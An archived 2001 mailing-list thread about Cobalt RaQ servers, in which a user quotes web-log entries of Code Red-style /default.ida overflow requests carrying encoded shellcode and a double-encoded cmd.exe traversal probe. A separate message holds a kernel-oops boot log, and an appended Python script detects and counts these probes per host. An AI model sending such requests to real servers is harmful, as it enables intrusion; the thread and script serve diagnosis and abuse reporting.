It's automated zombies from one of the previous Microsoft exploits. Try
notifying the ISP and/or upstream provider that there's an infected
server molesting you.
Ritch
Pierre Maloka wrote:
>Silly virus scans. They are trying to find NT machines to take advantage of.
>I got hundreds today, and nobody even knows what my website is. I typically
>get < 10 legit hits a day. I wish there was some way to turn these guys in.
>I got over 80 requests from "dsl-64-195-90-29.telocity.com" alone.
>
>>-----Original Message-----
>>From: [EMAIL PROTECTED]
>>[mailto:[EMAIL PROTECTED]]On Behalf Of KAMRY
>>Sent: Tuesday, September 18, 2001 10:35 PM
>>To: [EMAIL PROTECTED]
>>Subject: [cobalt-developers]
>>/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXX
>>
>>
>>
>>Does anyone know about these scans:
>>
>>/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXX
>>XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6
>>858%ucbd3%
>>u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
>>HTTP/1.0" 302 627 "-" "-"
>>
>>/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXX
>>XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
>>XXXXXXXXXX
>>XXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6
>>858%ucbd3%
>>u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
>>HTTP/1.0" 302 632 "-" "-"
>>
>>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 250 "-" "-"
>>
>>-----Original Message-----
>>From: [EMAIL PROTECTED]
>>[mailto:[EMAIL PROTECTED]]On Behalf Of Matthias
>>Pigulla
>>Sent: Tue, September 18, 2001 8:57 AM
>>To: '[EMAIL PROTECTED]'
>>Subject: [cobalt-developers] RaQ3 kernel oops
>>
>>
>>Hi folks,
>>
>>I sent this to the developers list, as I consider this a fairly technical
>>issue, and I hope to find some kernel experts here :)-
>>
>>We've had a lot of trouble with one of our RaQ3 appliances during the last
>>days. To cut a long story short, we checked all RAM modules,
>>installed a new
>>hard disk drive, manually restored from our backups and tried to
>>install the
>>Kernel 2.2.14 .pkg.
>>
>>As to the backups, we made a copy of the entire disk when we first got the
>>machine and we make daily backups. So we copied the "factory new"
>>files onto
>>a new HDD using another linux machine and extracted our daily backup
>>replacing existing files.
>>
>>Now we're stuck with the following messages when booting. I can't
>>figure out
>>what this problem might be related to; we also checked it by
>>installing the
>>same HDD in another RaQ3 with some minor differences in the specs
>>(no SCSI,
>>just one eth interface), getting the same messages.
>>
>> Cobalt Networks - 'We serve it, you surf it'
>> Firmware version 2.3.0
>>
>>ROM Build info: Wed Oct 6 15:23:25 PDT 1999 freakshow.cobaltnet.com
>>System serial number: 3C03AM0127177
>>Memory found: 384 MB
>>Initializing I2C bus: done
>>Scanning PCI bus: done
>>Initializing IDE: done
>> IDE 0 master: found
>> slave: not found
>> IDE 1 master: not found
>> slave: not found
>>Initializing SCSI: done
>>Initializing ethernet: done
>>Initializing EEPROMs: done
>> EEPROM Bank 0: Intel E28F008S5 1MB
>> EEPROM Bank 1: not installed.
>>Mounting rom_fs: done
>>Initializing RTC: done
>>Initializing i18n - language "en": done
>>
>>Press spacebar to enter ROM mode
>>Booting default method - From disk
>>
>>First stage kernel: Decompressing - done
>>Linux version 2.2.12C3 (thockin@freakshow) (gcc version egcs-2.91.66
>>19990314/Li
>>nux (egcs-1.1.2 release)) #1 (ROM kernel) Wed Oct 6 15:16:06 PDT 1999
>>Detected 298807169 Hz processor.
>>Calibrating delay loop... 596.38 BogoMIPS
>>Memory: 14424k/16384k available (1080k kernel code, 416k reserved, 400k
>>data, 64
>>k init)
>>VFS: Diskquotas version dquot_6.4.0 initialized
>>Enabling new style K6 write allocation for 16 Mb
>>CPU: AMD AMD-K6(tm) 3D processor stepping 0c
>>Checking 386/387 coupling... OK, FPU using exception 16 error reporting.
>>Checking 'hlt' instruction... OK.
>>POSIX conformance testing by UNIFIX
>>mtrr: v1.35a (19990819) Richard Gooch ([EMAIL PROTECTED])
>>PCI: Using configuration type 1
>>PCI: Probing PCI hardware
>>PCI: Assigning I/O space 5800-583f to device 00:18
>>Linux NET4.0 for Linux 2.2
>>Based upon Swansea University Computer Society NET3.039
>>NET4: Unix domain sockets 1.0 for Linux NET4.0.
>>NET4: Linux TCP/IP 1.0 for NET4.0
>>IP Protocols: ICMP, UDP, TCP, IGMP
>>IPv4 over IPv4 tunneling driver
>>early initialization of device tunl0 is deferred
>>GRE over IPv4 tunneling driver
>>early initialization of device gre0 is deferred
>>NET4: AppleTalk 0.18 for Linux NET4.0
>>Initializing RT netlink socket
>>Starting kswapd v 1.2
>>Cobalt temperature sensor v1.2 enabled
>>Serial driver version 4.27 with no serial options enabled
>>ttyS00 at 0x03f8 (irq = 4) is a 16550A
>>ttyS01 at 0x02f8 (irq = 3) is a 16550A
>>Keyboard timeout[2]
>>Keyboard timeout[2]
>>pty: 256 Unix98 ptys configured
>>Real Time Clock Driver v1.09
>>lcd: Cobalt LCD Driver v3.01 by
>>lcd: Andrew Bose <[EMAIL PROTECTED]>, Timothy Stonis <tialtnet.com>
>>loop: registered device at major 7
>>Uniform Multi-Platform E-IDE driver Revision: 6.20
>>ALI15X3: IDE controller on PCI bus 00 dev 78
>>ALI15X3: 100% native mode on irq 14
>> ide0: BM-DMA at 0xf000-0xf007, BIOS settings: hda:DMA, hdb:DMA
>> ide1: BM-DMA at 0xf008-0xf00f, BIOS settings: hdc:DMA, hdd:DMA
>>hda: MAXTOR 4K040H2, ATA DISK drive
>>ide0 at 0x1f0-0x1f7,0x3f6 on irq 14
>>ALI15X3: Ultra DMA enabled
>>hda: MAXTOR 4K040H2, 38182MB w/2000kB Cache, CHS=12042/16/63, (U)DMA
>>md driver 0.36.6 MAX_MD_DEV=4, MAX_REAL=8
>>linear personality registered
>>raid0 personality registered
>>raid1 personality registered
>>sym53c8xx: at PCI bus 0, device 14, function 0
>>sym53c8xx: 53c875 detected
>>sym53c875-0: rev=0x04, base=0xc0000000, io_port=0x1000, irq=12
>>sym53c875-0: NCR clock is 40037KHz, 40218KHz
>>sym53c875-0: ID 7, Fast-20, Parity Checking
>>sym53c875-0: on-chip RAM at 0xc0008000
>>sym53c875-0: restart (scsi reset).
>>sym53c875-0: Downloading SCSI SCRIPTS.
>>scsi0 : sym53c8xx - version 1.3g
>>scsi : 1 host.
>>scsi : detected total.
>>PPP: version 2.3.7 (demand dialling)
>>TCP compression code copyright 1989 Regents of the University of
>>California
>>PPP line discipline registered.
>>eth0: Invalid EEPROM checksum 0xe50b, check settings before
>>activating this
>>devi
>>ce!
>>eth0: Intel EtherExpress Pro 10/100 at 0x1100, 00:10:E0:01:2B:D3, IRQ 11.
>> Board assembly 000000-000, Physical connectors present:
>> Primary interface chip None PHY #0.
>> General self-test: passed.
>> Serial sub-system self-test: passed.
>> Internal registers self-test: passed.
>> ROM checksum self-test: passed (0xdbd8681d).
>> Receiver lock-up workaround activated.
>>eth1: Invalid EEPROM checksum 0xe70b, check settings before
>>activating this
>>devi
>>ce!
>>eth1: Intel EtherExpress Pro 10/100 at 0x1200, 00:10:E0:01:2B:D5, IRQ 10.
>> Board assembly 000000-000, Physical connectors present:
>> Primary interface chip None PHY #0.
>> General self-test: passed.
>> Serial sub-system self-test: passed.
>> Internal registers self-test: passed.
>> ROM checksum self-test: passed (0xdbd8681d).
>> Receiver lock-up workaround activated.
>>Partition check:
>> hda: hda1 hda2 hda3 hda4
>>VFS: Mounted root (ext2 filesystem) readonly.
>>Freeing unused kernel memory: 64k freed
>>Unable to handle kernel NULL pointer dereference at virtual
>>address 00000008
>>current->tss.cr3 = 00101000, %cr3 = 00101000
>>*pde = 00000000
>>Oops: 0000
>>CPU: 0
>>EIP: 0010:[<c012b4dc>]
>>EFLAGS: 00010282
>>eax: 00000000 ebx: fffffff4 ecx: c0290140 edx: c0290090
>>esi: c02900e0 edi: c0097dc0 ebp: c0003f44 esp: c0003f10
>>ds: 0018 es: 0018 ss: 0018
>>Process swapper (pid: 1, process nr: 1, stackpage=c0003000)
>>Stack: c0003f44 00000000 c0237005 0000000b c0097e0c c012b6bc c0290060
>>c0003f44
>> 0000000b c0236020 ffffffe9 00000003 17ffffb4 c0237001 00000003
>>00006226
>> c012b83a c0237000 c0290060 00000001 c0236020 ffffffe9 c0106000
>>17ffffb4
>>Call Trace: [<c012b6bc>] [<c012b83a>] [<c0106000>] [<c01243f8>]
>>[<c0106000>]
>>[<c
>>012463a>] [<c0109a04>]
>> [<c01db805>] [<c0106000>] [<c01060ab>] [<c010856b>]
>>Code: 8b 40 08 ff d0 89 c3 83 c4 08 85 db 74 0e 56 e8 48 47 00 00
>>
>>Any hints on how I could proceed? What exactly does the RaQ boot procedure
>>look like? I noticed that there are two "stages" in the boot
>>process, and it
>>seems to me as if the first stage boots a kernel from ROM? As we're stuck
>>during the first stage, does this mean I should check my ROM
>>configuration?
>>This seems weird, as the other machine we've tested behaves the same way.
>>
>>TIA,
>>Matthias
>>--
>>
>> w e b f a c t o r y G m b H
>> Matthias Pigulla <[EMAIL PROTECTED]> - Geschaeftsfuehrer
>> Lessingstr. 60 - D-53113 Bonn - Germany - www.webfactory.de
>> Fon +49(0)228-9114455 - Fax +49(0)228-9114499 - ICQ 49185492
>>
>>_______________________________________________
>>cobalt-developers mailing list
>>[EMAIL PROTECTED]
>>http://list.cobalt.com/mailman/listinfo/cobalt-developers
_______________________________________________
cobalt-developers mailing list
[EMAIL PROTECTED]
http://list.cobalt.com/mailman/listinfo/cobalt-developers
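
Added example, not part of the original thread: a Python script that tallies, per source host, the two request shapes quoted above (the padded /default.ida request and the double-encoded cmd.exe traversal), which is the count an abuse report to the ISP or upstream provider would cite. The Apache log layout, the 100-character padding threshold, the label names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Assumed layout: Apache common/combined log line
# (host ident user [time] "request" status ...)
LINE_RE = re.compile(r'^(?P<host>\S+) \S+ \S+ \[[^\]]*\] "[A-Z]+ (?P<uri>\S+)[^"]*" \d{3}')
# Shape 1: /default.ida? + 100 or more repeats of one filler letter + %uXXXX tokens
# (the 100-repeat threshold is an assumption; the quoted requests carry far more)
IDA_RE = re.compile(r'^/default\.ida\?([A-Za-z])\1{99,}(?:%u[0-9a-fA-F]{4})+')

def fully_decode(uri, rounds=3):
    """Percent-decode repeatedly so %252f -> %2f -> / is seen as a slash."""
    for _ in range(rounds):
        decoded = unquote(uri)
        if decoded == uri:
            break
        uri = decoded
    return uri.replace("\\", "/").lower()

def classify(uri):
    """Return a label for the two probe shapes, or None for anything else."""
    if IDA_RE.match(uri):
        return "ida_overflow_probe"
    path = fully_decode(uri).split("?", 1)[0]
    # Shape 2: directory traversal that ends at cmd.exe once decoding is undone
    if "../" in path and path.endswith("/cmd.exe"):
        return "cmd_exe_traversal_probe"
    return None

def summarize(lines):
    """Map each source host to a Counter of probe labels seen from it."""
    per_host = {}
    for line in lines:
        m = LINE_RE.match(line)
        label = classify(m.group("uri")) if m else None
        if label:
            per_host.setdefault(m.group("host"), Counter())[label] += 1
    return per_host

PAD = "X" * 224  # constructed filler, same character as in the quoted requests
TS = "[18/Sep/2001:22:01:07 -0400]"  # constructed timestamp
SAMPLE_LOG = [  # constructed lines; hosts are documentation addresses
    f'192.0.2.10 - - {TS} "GET /default.ida?{PAD}%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 302 627 "-" "-"',
    f'192.0.2.10 - - {TS} "GET /default.ida?{PAD}%u9090%u6858%ucbd3%u7801=a HTTP/1.0" 302 632 "-" "-"',
    f'192.0.2.10 - - {TS} "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 250 "-" "-"',
    f'203.0.113.5 - - {TS} "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 250 "-" "-"',
    f'198.51.100.7 - - {TS} "GET /index.html HTTP/1.0" 200 1043 "-" "-"',
]

if __name__ == "__main__":
    for host, counts in sorted(summarize(SAMPLE_LOG).items()):
        print(host, dict(counts))
```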